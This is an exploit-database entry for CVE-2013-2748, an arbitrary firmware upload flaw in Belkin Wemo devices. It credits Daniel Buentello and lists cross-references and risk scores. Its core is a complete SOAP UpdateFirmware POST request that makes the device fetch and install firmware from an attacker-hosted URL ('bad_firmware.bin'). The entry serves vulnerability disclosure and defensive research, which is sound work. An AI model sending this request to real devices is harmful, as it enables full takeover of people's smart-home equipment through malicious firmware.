Belkin Wemo - Arbitrary Firmware Upload

🗓️ 08 Apr 2013 00:00:00Reported by Daniel BuentelloType

Belkin Wemo Arbitrary Firmware Vulnerability, allows arbitrary firmware upload via SOAP reques

Reporter	Title	Published	Views	Family All 8
0day.today	Belkin Wemo - Arbitrary Firmware Upload Vulnerability	9 Apr 201300:00	–	zdt
CVE	CVE-2013-2748	28 Jan 202019:49	–	cve
Cvelist	CVE-2013-2748	28 Jan 202019:49	–	cvelist
exploitpack	Belkin Wemo - Arbitrary Firmware Upload	8 Apr 201300:00	–	exploitpack
NVD	CVE-2013-2748	28 Jan 202020:15	–	nvd
Packet Storm	Belkin Wemo Arbitrary Firmware Upload	7 Apr 201300:00	–	packetstorm
Prion	Information disclosure	28 Jan 202020:15	–	prion
seebug.org	Belkin Wemo - Arbitrary Firmware Upload	1 Jul 201400:00	–	seebug

# Exploit Title: Belkin Wemo Arbitrary Firmware Vulnerability
# Date: 4/3/13
# Exploit Author: Daniel Buentello
# Vendor Homepage: http://www.belkin.com/us/wemo
# Version: Any version prior to WeMo_US_2.00.2176.PVT
# CVE : CVE-2013-2748


POST /upnp/control/firmwareupdate1 HTTP/1.1
SOAPACTION: "urn:Belkin:service:firmwareupdate:1#UpdateFirmware"
Content-Length: 
Content-Type: text/xml; charset="utf-8"
HOST: 10.0.1.8:49153
User-Agent: 

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <s:Body>
  <u:UpdateFirmware xmlns:u="urn:Belkin:service:firmwareupdate:1">
   <ReleaseDate>07Jan2013</ReleaseDate><NewFirmwareVersion>1</NewFirmwareVersion><URL>http://10.0.1.99/bad_firmware.bin
  </u:UpdateFirmware>
 </s:Body>
</s:Envelope>

PoC Video:
https://www.youtube.com/watch?v=BcW2q0aHOFo

08 Apr 2013 00:00Current

9.7High risk

Vulners AI Score9.7

CVSS 27.5

CVSS 3.19.8

EPSS0.43777